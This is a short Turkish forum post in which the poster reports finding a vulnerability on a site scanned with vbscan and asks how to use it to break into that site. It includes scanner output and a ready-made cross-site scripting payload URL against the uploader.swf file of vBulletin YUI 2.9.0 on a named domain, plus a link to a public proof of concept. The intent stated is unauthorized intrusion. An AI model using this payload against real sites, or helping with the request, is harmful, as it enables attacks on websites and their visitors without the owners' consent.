herkese merhabalar vbscan ile tarattığım bir sitede şu açığı buldum:
bu açığı kullanarak nasıl bu siteye sızabilirim ? iyi çalışmalar
Code:
[+] Checking vBulletin YUI 2.9.0 XSS
[++] uploader.swf is vulnerable
http://www.gizlimabet.com//clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert(/XSS/);}//
POC : https://packetstormsecurity.com/files/124746/vBulletin-YUI-2.9.0-Cross-Site-Scripting.html